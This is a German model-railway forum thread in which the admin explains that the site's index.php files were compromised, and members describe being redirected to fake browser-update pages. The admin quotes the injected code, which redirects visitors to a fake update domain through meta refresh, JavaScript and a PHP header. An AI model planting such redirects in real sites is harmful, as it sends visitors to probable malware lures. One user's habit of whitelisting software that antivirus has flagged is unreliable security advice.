Die Sechser - Anlagenmeisterei und Treffpunkt für Eisenbahnverrückte

Anlagenmeisterei
https://www.anlagenmeisterei.de/

Infektion auf unserer Seite

https://www.anlagenmeisterei.de/viewtopic.php?t=4379

Seite 1 von 1

Infektion auf unserer Seite

Verfasst: 18.04.2023, 17:50
von Fahrdienstleitung
Kurze Info für Euch warum die Seite heute bis heute Nachmittag offline war

Heute am Nachmittag habe ich von unseren Volkhard die Info erhalten, das unsere sechser Seite nicht online ist.
Nachdem ich bei meinem Provider nachgefragt hatte, schrieb er mir das die Seite sich einen Virus eingefangen hat (alle index.php) wurden geändert.
Unsere Datenbank wo eure Texte drin sind, die wurde nicht angegriffen. :!:
Also habe ich schnell ein Backup der zerstörten Dateien eingespielt und die Seite war / ist wieder online.
Wie immer gilt:
Wenn ihr etwas findet was nicht funktioniert, lasst es mich wissen.

Euer Admin

Nachtrag:
Wer die Seite während sie nicht erreichbar war besucht haben sollte, hatte nie Kontakt zur sechser Seite, da die Umleitung in der "index.php" sofort aktiv war.
Hier mal der Code von der "index.php" wem es interessiert.

Code: Alles auswählen

<!DOCTYPE HTML>
<html lang="en-US">
    <head>
        <meta charset="UTF-8">
        <meta http-equiv="refresh" content="0; url=https://browserupdate.space">
        <script type="text/javascript">
            window.location.href = "https://browserupdate.space"
        </script>
        <title>Loading</title>
    </head>
    <body>
	<?php
	header('Location: https://browserupdate.space');
	?>
    </body>
</html>

Re: Infektion auf unserer Seite

Verfasst: 18.04.2023, 17:58
von vaueh
Vielen Dank.

Heute morgen um 09.00h bestand das Problem wohl schon. Ich wurde unablässig umgeleitet und sollte
meinen Firefox auf Version 16.xx (das war so um 2012) updaten.

Hoffentlich hat niemand auf solchen Blödsinn reagiert.

Volker

Re: Infektion auf unserer Seite

Verfasst: 18.04.2023, 18:04
von BR189
Bei mir war es ein Chrome-Update. Lustiger weise direkt nachdem ich mein Chrome geupdated hatte, weswegen ich ein wenig verunsichert war.

Re: Infektion auf unserer Seite

Verfasst: 18.04.2023, 18:19
von BikeMike
Ich dachte erst, ich hätte selbst 'nen Virus eingefangen. Da aber die Zielseite nicht von mozilla war, guckte ich bei Chrome, Edge und Smartphone: Überall dieselbe Umleitung. Damit war klar, das Forum selbst war infiziert. Avast hat den Link übrigens auch als infiziert gemeldet. Hoffentlich hat sich niemand angesteckt. Und vielen Dank an die Forumsleitung für die schnelle Reparatur.

LG Michael

Re: Infektion auf unserer Seite

Verfasst: 18.04.2023, 18:55
von SprengmeisterM
Klasse für die schnelle Reaktion.
Ich war auch verunsichert, ich habe mit zwei Browsern und über das Handy versucht die Anlagenmeisterei zu erreichen. Als dies nicht funktionierte habe ich im EEP Forum einen Thread eröffnet um Nutzer zu warnen, denn im anderen Forum sind ja auch viele von uns sechser unterwegs

Toll das ihr das Problem so schnell in den Griff bekommen habt

Viele Grüße Mirko

Re: Infektion auf unserer Seite

Verfasst: 18.04.2023, 23:58
von Baureihe 62
Wer glaubt den ernsthaft so'n sche...?

Selbstverständlich wird eine Seite wie die sechser Anlagenmeisterei sofort gehackt. Es ist schließlich eine hochinformative Seite, von Experten betrieben und benutzt.

Da kommt ganz schnell der Neid auf. Und so versucht man halt, sein ADS-Problem mit einer Fake-Info zu vertuschen...

Wahrscheinlich war das Ziel, die Generation Vollpfosten noch dümmer dazustellen, als sie eh schon ist...
Vor allem dann, wenn "Chrome-Extensions" als Schadsoftware markiert werden. (UBlock & Ghostery sind wahrlich feine Helfer, aber garantiert KEINE Schadsoftware...:)

Danke an unseren Admin für das Wiederherstellen des Forums !!!

@Mirko:

Den Tröt beim EEP-Forum hättest du dir sparen können. Nicht, das ich nicht will, das andere durch Fehlinformationen geschädigt werden, aber die Admin-Reaktion zeigt doch sehr deutlich, wie es den "Besseren" am Ar... vorbei geht. BTW: Virusverseuchte Links und Datenausleserei? Da hat der Trend-Verlag weit die Nase vorn:

Auf meinem EEP+++Rechner hat der Windows Defender meinen HomeNos 14 als Malware & Trojaner mit Portöffnung entlarvt. Ergebnis: Der HN14 flog direkt von der Platte. Sogar die Verknüpfung auf dem Desktop hat der Defender gekillt. Die EXE war nicht einmal in Quarantäne! Soviel zur Virenseuche und Schadsoftware!

Ach so, falls jemand jetzt meint, das müsse ich im anderen Forum ansprechen; Habe ich, jetzt habe ich noch den "Gast"-Status...

Achtet stets auf solche "Virusfallen" wenn Ihr egal welche Seiten aufruft. Testet erst andere, euch vertraute und bekannte Seiten wie z.B. die Tageszeitung.

Gruß Dirk

PS: Trend liest vor allem den "My Project" oder "Meine Projekt"-Ordner aus.

Re: Infektion auf unserer Seite

Verfasst: 19.04.2023, 12:45
von vorade
...ich bedanke mich mal sehr beim Jörg, daß er so schnell reagieren konnte und nun Alles wieder läuft !!

Vielen Dank Jörg und viele Grüße

Volkhard

Re: Infektion auf unserer Seite

Verfasst: 19.04.2023, 12:50
von Heizer_Lok
Baureihe 62 hat geschrieben: 18.04.2023, 23:58 Auf meinem EEP+++Rechner hat der Windows Defender meinen HomeNos 14 als Malware & Trojaner mit Portöffnung entlarvt. Ergebnis: Der HN14 flog direkt von der Platte. Sogar die Verknüpfung auf dem Desktop hat der Defender gekillt. Die EXE war nicht einmal in Quarantäne! Soviel zur Virenseuche und Schadsoftware!
In einem solchen Falle belasse ich die Software und setze diese als Ausnahme, und, sehr wichtig, ich sperre im Firewall das Programm, damit es nicht mehr nach Hause telefonieren kann.

Gruß
Albrecht
Alle Zeiten sind UTC+02:00
Seite 1 von 1

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de